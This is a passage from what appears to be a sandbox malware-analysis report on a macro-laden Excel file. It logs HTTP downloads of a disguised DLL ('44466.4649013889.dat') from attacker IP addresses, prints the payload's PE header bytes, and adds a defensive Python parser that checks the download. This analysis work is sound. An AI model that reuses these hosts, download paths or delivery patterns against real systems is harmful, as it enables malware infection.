      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: SVR2 executable (USS/370) not stripped - version 12587540, Stream Size: 865
      General
      Stream Path:_VBA_PROJECT_CUR/VBA/dir
      File Type:SVR2 executable (USS/370) not stripped - version 12587540
      Stream Size:865
      Entropy:6.55213343791
      Base64 Encoded:True
      Data ASCII:. ] . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . v . A c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
      Data Raw:01 5d b3 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 ba 76 a0 41 63 02 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

      Network Behavior

      Network Port Distribution

      TCP Packets

      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Sep 27, 2021 11:10:24.232299089 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:24.402055025 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:24.402177095 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:24.402961969 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:24.572657108 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458786011 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458848000 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458865881 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458884001 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458899975 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458915949 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458930016 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458954096 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458978891 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.458996058 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.459002018 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.459044933 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.459048986 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.468147993 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.628865004 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.628891945 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.628906965 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.628926039 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.628947020 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.628963947 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.628983974 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629002094 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629019022 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629045963 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629060030 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629072905 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629085064 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629106998 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629126072 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629142046 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.629743099 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.629817963 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.629826069 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.629829884 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.629832983 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.629836082 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.629837990 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.629839897 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.631917953 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.663012981 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.663055897 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.663075924 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.663156033 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.663337946 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.800775051 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.800831079 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.800848961 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.800868034 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.800885916 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.800991058 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.801026106 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.801054955 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.801080942 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.801101923 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.801105976 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.801120996 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.801139116 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.801143885 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.801162958 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.864458084 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.864492893 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.864516020 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.864538908 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.864561081 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.864588022 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.864612103 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.864682913 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.864713907 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.864799023 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.864814043 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.864975929 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.865458012 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.865492105 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.865601063 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.866909981 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.866940975 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.866945028 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.866947889 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.866950989 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:25.970748901 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:25.971235991 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:26.065752983 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.065821886 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.065840960 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.065859079 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.065876961 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.066268921 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173
      Sep 27, 2021 11:10:26.066483974 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.066519022 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.066543102 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.066565037 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.066586971 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.066612005 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.066636086 CEST | 80 | 49165 | 190.14.37.173 | 192.168.2.22
      Sep 27, 2021 11:10:26.067260027 CEST | 49165 | 80 | 192.168.2.22 | 190.14.37.173

      HTTP Request Dependency Graph

      • 190.14.37.173
      • 111.90.148.104
      • 51.89.115.111

      HTTP Packets

      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
      0 | 192.168.2.22 | 49165 | 190.14.37.173 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp | kBytes transferred | Direction | Data
      Sep 27, 2021 11:10:24.402961969 CEST | 0 | OUT | GET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 190.14.37.173
      Connection: Keep-Alive
      Sep 27, 2021 11:10:25.458786011 CEST | 1 | IN | HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:25 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$aT%}:Y%}:Y%}:YrZY&}:YDY$}:YGY>}:YTY}:YrdY"}:Y%};Y}:YUYq}:Y@Y$}:YFY$}:YCY$}:YRich%}:YPELy_E!1?9<`p/@,.text5 `.rdata@@.data<PP@.reloc$`0`@B
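The response above is served as application/octet-stream with a ".dat" attachment name, but the body begins with an MZ header, a DOS stub, a Rich header and a PE signature at offset 0x100; the report's "Document exploit detected (drops PE files)" and "Regsvr32 Command Line Without DLL" findings follow from that. The following is an added example, not part of the Joe Sandbox report, that makes this check explicit: it parses the HTTP response headers, then the DOS, PE/COFF and section headers of the body, and compares the declared Content-Length with the file size the section table implies. SAMPLE_RESPONSE is rebuilt from the session 0 dump (headers as shown; the first 664 bytes of the body: DOS header, stub, Rich header, PE/COFF header, the first 96 bytes of the optional header and the four section headers). The 128-byte data-directory table between the optional header and the section table is zero-filled rather than copied from the dump (constructed); nothing below reads it.

```python
"""Added example (not from the report): headers-versus-body check for a served ".dat"."""
import re
import struct

IMAGE_FILE_DLL = 0x2000
IMAGE_FILE_MACHINE_I386 = 0x014C
PE32_MAGIC = 0x010B

# Response headers as shown in the report for session 0.
RESPONSE_HEAD = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx\r\n"
    b"Date: Mon, 27 Sep 2021 09:10:25 GMT\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Length: 495616\r\n"
    b"Connection: keep-alive\r\n"
    b"X-Powered-By: PHP/5.4.16\r\n"
    b"Accept-Ranges: bytes\r\n"
    b"Expires: 0\r\n"
    b"Cache-Control: no-cache, no-store, must-revalidate\r\n"
    b'Content-Disposition: attachment; filename="44466.4649013889.dat"\r\n'
    b"\r\n"
)

# Body bytes 0..375 from the report's Data Raw field: DOS header, DOS stub, Rich
# header, PE signature, COFF header and the first 96 bytes of the optional header.
MZ_HEADERS = (
    "4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000"
    "00000000 00000000 00000000 00000000 00000000 00000000 00000000 00010000"
    "0e1fba0e 00b409cd 21b8014c cd215468 69732070 726f6772 616d2063 616e6e6f"
    "74206265 2072756e 20696e20 444f5320 6d6f6465 2e0d0d0a 24000000 00000000"
    "611c540a 257d3a59 257d3a59 257d3a59 e6725a59 267d3a59 b2b94459 247d3a59"
    "02bb4759 3e7d3a59 02bb5459 a57d3a59 e6726459 227d3a59 257d3b59 807d3a59"
    "02bb5559 717d3a59 02bb4059 247d3a59 02bb4659 247d3a59 02bb4359 247d3a59"
    "52696368 257d3a59 00000000 00000000 00000000 00000000 00000000 00000000"
    "50450000 4c010400 795f0745 00000000 00000000 e0000221 0b010800 00900200"
    "00f00e00 00000000 df310000 00100000 00a00200 00000010 00100000 00100000"
    "04000000 00000000 04000000 00000000 00901100 00100000 d4fe0700 02000000"
    "00001000 00100000 00001000 00100000 00000000 10000000"
)
# Body bytes 504..663 from the same dump: the four IMAGE_SECTION_HEADERs.
SECTION_TABLE = (
    "2e746578 74000000 358e0200 00100000 00900200 00100000 00000000 00000000"
    "00000000 20000060 2e726461 74610000 b6a00400 00a00200 00b00400 00a00200"
    "00000000 00000000 00000000 40000040 2e646174 61000000 3c0b0a00 00500700"
    "00100000 00500700 00000000 00000000 00000000 400000c0 2e72656c 6f630000"
    "e6240000 00601100 00300000 00600700 00000000 00000000 00000000 40000042"
)
# bytes(128) stands in for the data-directory table (constructed, not read below).
BODY_PREFIX = bytes.fromhex(MZ_HEADERS) + bytes(128) + bytes.fromhex(SECTION_TABLE)
SAMPLE_RESPONSE = RESPONSE_HEAD + BODY_PREFIX


def parse_http_response(raw):
    """Split a raw HTTP/1.1 response into (status code, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP head")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii")] = value.strip().decode("latin-1")
    return status, headers, body


def parse_pe_headers(data):
    """Parse the DOS header, PE/COFF header, PE32 optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != PE32_MAGIC:
        raise ValueError("only PE32 handled here, magic=0x%x" % magic)
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, off)
        flags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize, "flags": flags})
    return {"machine": machine, "timestamp": timestamp, "characteristics": characteristics,
            "entry_rva": entry_rva, "image_base": image_base, "subsystem": subsystem,
            "sections": sections}


def classify_download(raw_response):
    """Compare what the headers claim with what the body is."""
    status, headers, body = parse_http_response(raw_response)
    pe = parse_pe_headers(body)
    m = re.search(r'filename="?([^";]+)"?', headers.get("content-disposition", ""))
    declared_len = int(headers.get("content-length", "0"))
    # File size the section table implies: end of the last section's raw data on disk.
    implied_len = max(s["rawptr"] + s["rawsize"] for s in pe["sections"])
    return {"status": status, "declared_name": m.group(1) if m else "",
            "content_type": headers.get("content-type", ""),
            "is_dll": bool(pe["characteristics"] & IMAGE_FILE_DLL),
            "is_i386": pe["machine"] == IMAGE_FILE_MACHINE_I386,
            "image_base": pe["image_base"], "sections": [s["name"] for s in pe["sections"]],
            "declared_length": declared_len, "implied_length": implied_len,
            "complete": declared_len == implied_len}


if __name__ == "__main__":
    print(classify_download(SAMPLE_RESPONSE))
```

On this response the body is a 32-bit PE with the DLL characteristic set (0x2102), image base 0x10000000 and sections .text/.rdata/.data/.reloc, and the 495616-byte Content-Length equals the end of the .reloc section's raw data, so the full DLL was delivered in one transfer.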


      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
      1 | 192.168.2.22 | 49166 | 111.90.148.104 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Timestamp | kBytes transferred | Direction | Data
      Sep 27, 2021 11:10:29.093961954 CEST | 521 | OUT | GET /44466.4649013889.dat HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 111.90.148.104
      Connection: Keep-Alive
      Sep 27, 2021 11:10:29.995018005 CEST | 522 | IN | HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 27 Sep 2021 09:10:30 GMT
      Content-Type: application/octet-stream
      Content-Length: 495616
      Connection: keep-alive
      X-Powered-By: PHP/5.4.16
      Accept-Ranges: bytes
      Expires: 0
      Cache-Control: no-cache, no-store, must-revalidate
      Content-Disposition: attachment; filename="44466.4649013889.dat"
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 1c 54 0a 25 7d 3a 59 25 7d 3a 59 25 7d 3a 59 e6 72 5a 59 26 7d 3a 59 b2 b9 44 59 24 7d 3a 59 02 bb 47 59 3e 7d 3a 59 02 bb 54 59 a5 7d 3a 59 e6 72 64 59 22 7d 3a 59 25 7d 3b 59 80 7d 3a 59 02 bb 55 59 71 7d 3a 59 02 bb 40 59 24 7d 3a 59 02 bb 46 59 24 7d 3a 59 02 bb 43 59 24 7d 3a 59 52 69 63 68 25 7d 3a 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 79 5f 07 45 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 90 02 00 00 f0 0e 00 00 00 00 00 df 31 00 00 00 10 00 00 00 a0 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 11 00 00 10 00 00 d4 fe 07 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 3f 07 00 d6 00 00 00 04 39 07 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 11 00 e0 0f 00 00 70 a1 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 2f 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 02 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 35 8e 02 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b6 a0 04 00 00 a0 02 00 00 b0 04 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 0b 0a 00 00 50 07 00 00 10 00 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 e6 24 00 00 00 60 11 00 00 30 00 00 00 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 